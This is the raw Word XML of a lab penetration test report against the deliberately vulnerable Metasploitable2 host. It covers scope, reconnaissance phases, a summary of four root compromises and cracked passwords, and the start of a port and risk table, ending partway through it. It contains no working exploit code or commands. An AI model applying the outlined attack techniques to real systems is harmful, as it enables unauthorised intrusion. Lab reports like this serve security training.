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1F3864"/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
        <w:t xml:space="preserve">PENETRATION TEST REPORT</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="300" w:before="200"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E74B5"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">Metasploitable2 Vulnerability Assessment</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="595959"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Black-Box Penetration Test — Isolated Lab Environment</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="90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6550"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2800"/>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1a1a1a"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Prepared by</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6550"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="1a1a1a"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Vijay S</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2800"/>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1a1a1a"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Date</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6550"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="1a1a1a"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">June 15, 2026</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2800"/>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1a1a1a"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Target</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6550"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="1a1a1a"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">192.168.100.128 (Metasploitable2)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2800"/>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1a1a1a"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Attacker</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6550"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="1a1a1a"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">192.168.100.129 (Kali Linux)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2800"/>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1a1a1a"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Email</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6550"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="1a1a1a"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">reachvijays20@gmail.com</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2800"/>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1a1a1a"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">GitHub</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6550"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="1a1a1a"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">github.com/JacobVijay26</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2800"/>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1a1a1a"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Classification</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6550"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="1a1a1a"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">CONFIDENTIAL</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="2E74B5" w:sz="6" w:space="4"/>
        </w:pBdr>
        <w:spacing w:after="200" w:before="400"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">1. Executive Summary</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">This report presents the findings of a penetration test conducted against Metasploitable2 (IP: 192.168.100.128), an intentionally vulnerable Linux system used as a target within an isolated home lab environment. The assessment was performed as a black-box test from an attacking Kali Linux host on the same isolated network.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Complete system compromise was achieved through multiple independent attack vectors, including network service exploitation, database attacks, and web application vulnerabilities against the DVWA application hosted on the target. Four separate paths to root-level access were confirmed, and the majority of extracted credentials were cracked offline.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6550"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2800"/>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1a1a1a"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Target</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6550"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="1a1a1a"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">192.168.100.128 (Metasploitable2)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2800"/>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1a1a1a"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Attacker</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6550"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="1a1a1a"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">192.168.100.129 (Kali Linux)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2800"/>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1a1a1a"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Operating System</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6550"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="1a1a1a"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Linux 2.6.24-16-server</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2800"/>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1a1a1a"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Open Ports</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6550"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="1a1a1a"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">23</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2800"/>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1a1a1a"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Critical CVEs</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6550"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="1a1a1a"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">7</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2800"/>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1a1a1a"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Successful Exploits</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6550"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="1a1a1a"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">4 root shells</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2800"/>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1a1a1a"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Passwords Cracked</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6550"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="1a1a1a"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">10 / 11</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2800"/>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1a1a1a"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Overall Risk Rating</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6550"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="1a1a1a"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">CRITICAL</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="2E74B5" w:sz="6" w:space="4"/>
        </w:pBdr>
        <w:spacing w:after="200" w:before="400"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">2. Scope &amp; Methodology</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="140" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E74B5"/>
          <w:sz w:val="25"/>
          <w:szCs w:val="25"/>
        </w:rPr>
        <w:t xml:space="preserve">2.1 Scope</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Target: Metasploitable2 (192.168.100.128)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Attacker: Kali Linux (192.168.100.129)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Network: Isolated VMnet1 (192.168.100.0/24)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Test type: Black-box penetration test in isolated lab</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="140" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E74B5"/>
          <w:sz w:val="25"/>
          <w:szCs w:val="25"/>
        </w:rPr>
        <w:t xml:space="preserve">2.2 Phases</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Phase 1: Reconnaissance — 4 Nmap scans (basic, version, aggressive, vuln)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Phase 2: Exploitation — Metasploit, Netcat</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Phase 3: Post-Exploitation — Credential dumping, password cracking, VNC</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Phase 4: Web Application Testing — SQLi, XSS, Command Injection on DVWA</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="2E74B5" w:sz="6" w:space="4"/>
        </w:pBdr>
        <w:spacing w:after="200" w:before="400"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">3. Reconnaissance</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="140" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E74B5"/>
          <w:sz w:val="25"/>
          <w:szCs w:val="25"/>
        </w:rPr>
        <w:t xml:space="preserve">3.1 Nmap Basic Port Scan</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">A basic Nmap scan identified 23 open TCP ports on the target system. All ports represent potential attack surface and were individually assessed for known vulnerabilities.</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5334000" cy="4200525"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="240"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="595959"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure 3.1 — Nmap basic scan: 23 open ports identified on Metasploitable2 (192.168.100.128).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="140" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E74B5"/>
          <w:sz w:val="25"/>
          <w:szCs w:val="25"/>
        </w:rPr>
        <w:t xml:space="preserve">3.2 Open Ports &amp;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900"/>
        <w:gridCol w:w="2250"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1900"/>
            <w:shd w:fill="1F3864" w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Port</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2300"/>
            <w:shd w:fill="1F3864" w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Service</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2900"/>
            <w:shd w:fill="1F3864" w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Version</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2250"/>
            <w:shd w:fill="1F3864" w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Risk</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1900"/>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="1a1a1a"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">21/tcp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2300"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="1a1a1a"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">FTP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2900"/>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="1a1a1a"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">vsftpd 2.3.4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2250"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="C00000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">CRITICAL</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1900"/>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="1a1a1a"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">22/tcp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2300"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="1a1a1a"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">SSH</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2900"/>
